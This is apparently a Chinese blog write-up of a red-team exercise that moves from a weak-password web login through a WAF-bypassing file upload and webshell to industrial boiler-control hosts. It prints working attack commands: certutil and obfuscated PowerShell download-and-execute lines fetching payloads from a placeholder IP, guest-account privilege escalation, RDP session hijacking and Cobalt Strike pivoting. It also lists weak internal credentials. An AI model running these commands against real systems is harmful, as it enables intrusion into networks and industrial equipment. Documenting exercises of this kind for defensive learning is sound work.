前段時間參加了一次攻防演練,其中遇到了不少有意思的問題,最後也是進到了內網生產區,大體把過程寫一下。前期信息收集首先給定的目標是包括公司官網之類的互聯網資產,剛開始做信息收集的時候在各種互聯 網資產探測引擎上查找目標信息,嘗試了各種SQL注入以及反序列化等可以簡單getshell的方 式,然而並沒有什麼用。另外資產探測引擎一般會在每天的0點更新一次前一天發現的資 產,所以0點過後對白天搜索過的目標再檢索一次可能會有意想不到的收穫。對web資產直接訪問會經常訪問不到具體的系統,而是一些默認的中間件配置頁面,有些目 標可能因為有防護設備的原因,拿爆破目錄的工具一掃就被封IP,這很頭疼。。。某平台弱口令在探測引擎資產測試無果後,決定試一下用Nmap掃全端口,因為正常情況下fofa等工具很 難對某個IP做到百分之百的資產探測而且存在一定的延時性。在掃描某個IP的全端口之 後,找到了一個之前沒有發現的系統,而且存在弱口令。admin 123456通過髒字符繞waf,文件上傳獲取webshell進入系統後,翻了一遍各功能發現雖然是超級管理員權限,但是系統中並沒有包含員工的 敏感信息(眾所周知,身份證號等的敏感信息泄露可以用來刷分)或者是其他的有用數 據,所以嘗試一下對其中的搜索、上傳等功能進行利用看能不能getshell。系統的安全檢驗禁用了直接上傳jsp的方式,且大部分常見的上傳繞過方式都是不可用的
嘗試了幾處的文件上傳都無法成功,要麼就是可以上傳,但並不返回地址也不解析,白給了屬於是
最後在一個「通知發放」的功能中找到了一處可用的文件上傳漏洞,不過其中也是費盡一 些周折。經過多次嘗試後發現,在POST數據包中給文件名添加超長的髒字符數據可以繞過文件名的 安全檢驗,另外配合免殺的jsp馬直接獲取一個administrator權限的webshell(當然這種方式也 比較常見而且有失敗的可能,但是每種方法多試幾次,成功的概率總會比較大一些)。Burp上傳的數據包過長導致無法截全圖,但是基本思路是如下這樣(圖片來自互聯網,侵 刪),即在filename後的文件名字段添加不停地添加數據,這樣WAF可能為因為性能原因作 出讓步,超出檢查長度的內容,將不會被檢查。探測一下受害主機相關信息,發現目標主機出網,但是存在殺軟powershell繞過殺軟.上線cs既然現在我們有了一個webshell,那麼接下來的利用思路可以選擇證書下載或者powershell等 方式上線cs。可以嘗試使用證書下載嘗試下載木馬到服務器執行: certutil.exe -urlcache -split -f http://x.x.x.x/x.exe D:\x.exe很明顯,在安全設備的攔截下,這種基礎的證書下載也是白給powershell.exe IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/x'))先拿powershell試試,利用其實現與遠端IP進行通信,利用其傳遞木馬執行實現肉雞上線。其最主要優點就是無文件落地,痕跡只存在於內存進程之中,隱蔽性較強。不過正常來說 這種通過公網IP地址下載並執行木馬腳本,肯定會被殺毒軟件WAF等設備攔截,我們可以 通過對PowerShell語句進行改進、變換、拼接等操作,實現免殺。echo I^E^X ((new-object net.webclient).d^o^w^n^l^o^a^d^s^t^r^i^n^g('http://0.0.0.0)) | p^o^w^e^r^s^h^e^l^l -
讀密碼,搭建socks代理,進入內網主機上線CS後對本機進行信息收集,發現目標為server2012服務器,無法讀取明文密碼,因 此選擇激活guest用戶net user guest /active:yesnet user guest tide@123456net localgroup administrators guest /add
搭建socks5隧道登錄guest用戶,使用rdp劫持登錄administrator。query usersc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1為目標會 話id和當前會話名net start tide探測內網資產成功登錄後通過在本機進行信息收集,發現遠程連接的憑證信息,其它服務數據庫密碼等 等信息繼續對內網資產進行探測,發現一些MS17010以及數十台數據庫弱口令、還有一些內網web 弱口令等較多資產,這裡就不一一列舉了192.168.x.x mssql:sa/sa123mssql:192.168.x.x:1433:sa sa123突破到內網生產區專網原本以為作為一個常規內網,刷幾台數據庫+內網web弱口令+幾台SSH後就在此結束,但是 在內網資產收集過程中,通過數據庫命令執行發現某台機器存在多網卡191和192段通過查看進程,發現進程中存在MODBUS協議軟件進程,猜測為工控主機。因為無法連接191該段,嘗試了多種方法,最終通過通過cs正向木馬上線,以當前被控機作 為跳板機正向連接此191網段多網卡機器首先生成監聽器beacon-tcp,監聽在17775端口然後CS生成一個stageless木馬,選定剛才的新建 監聽器最後運行生成的木馬,並在 beacon中執行connect x.x.x.x 17775即可建立子beacon上線CS。上線cs後,嘗試搭建二層socks代理進入生產專網。獲取主機密碼後,登錄rdp,發現本機存在鍋爐監控系統(圖文無關)再對這台主機的內網資產進行探測,發現http://191.0.x.x user/123456 該設備為鍋爐監控控制 器,處理並轉發現場鍋爐設備的數據(圖文無關)然後通過某工控機-4 Administrator 空密碼(圖文無關)工控機1-Administrator 空密碼(圖文無關)還有幾台類似機器,就不把圖放上了,總的成果來說是這些總結1、信息收集真的很重要,哪怕是一個小小的弱口令最後都可能造成嚴重的後果。2、不要覺得掃全端口很麻煩,這招簡直屢試不爽,我經常在某個目標C段中每10個IP為一 組去挨個掃全端口,總能有一些新收穫。3、免殺和繞過需要不斷地積累學習,紅隊在進步,藍隊(設備)也在進步。
留言列表
留言列表